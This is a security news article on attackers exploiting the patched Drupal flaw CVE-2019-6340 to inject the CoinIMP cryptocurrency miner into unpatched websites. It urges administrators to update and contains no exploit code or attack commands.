Cybercriminals have actively started exploiting an already patched security vulnerability in the wild to install cryptocurrency miners on vulnerable Drupal websites that have not yet applied patches and are still vulnerable.
Last week, developers of the popular open-source content management system Drupal patched a critical remote code execution (RCE) vulnerability (CVE-2019-6340) in Drupal Core that could allow attackers to hack affected websites.
Despite releasing no technical details of the security vulnerability, the proof-of-concept (PoC) exploit code for the vulnerability was made publicly available on the Internet just two days after the Drupal security team rolled out the patched version of its software.
Now, security researchers at data center security vendor Imperva discovered a series of attacks—that began just a day after the exploit code went public—against its customers’ websites using an exploit that leverages the CVE-2019-6340 security flaw.
The attacks originated from several attackers and countries have found targeting vulnerable Drupal websites, including sites in government and the financial services industry, that are still vulnerable to the recently patched Drupal Core vulnerability.
According to the researchers, the attacks started on February 23, just three days after the Drupal developers patched the vulnerability, and attempted to inject a JavaScript cryptocurrency miner named CoinIMP on the vulnerable Drupal websites to mine Monero and Webchain cryptocurrencies for attackers.
Similar to the infamous CoinHive service, CoinIMP is a browser-based cryptocurrency mining script that attackers injected into the index.php file of the vulnerable Drupal websites so that site visitors will run the mining script and mine cryptocurrency when they browse the site’s main page.
This is not the first time when we saw attackers targeting vulnerable Drupal websites exploiting a recently patched vulnerability.
Last year, attackers targeted hundreds of thousands of Drupal websites in mass attacks using in the wild exploits leveraging two separate critical remote code execution vulnerabilities, which were dubbed Drupalgeddon2 and Drupalgeddon3.
In that case as well, the attacks started after security researchers released PoC exploit code for the Drupalgeddon2 and Drupalgeddon3 vulnerabilities on the Internet, which was then followed by large-scale Internet scanning and exploitation attempts.
While notifying you of the latest Drupal release last week that addressed this critical remote code execution vulnerability, The Hacker News also warned its readers about how popular Drupal exploits are among hackers and that you need to update your CMS as soon as possible.
Since it’s better late than never, sites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 8.6.10 or Drupal 8.5.11 as soon as possible to avoid exploits.
However, if your website has already been compromised, merely updating your Drupal website would not remove the “backdoors or malware code.” To fully resolve the issue you are recommended to follow the Drupal guide.
Last week, Check Point also disclosed a 19-year-old RCE vulnerability in the popular WinRAR software, which has also been found actively exploiting in the wild to install malware on computers still running the vulnerable version of the software.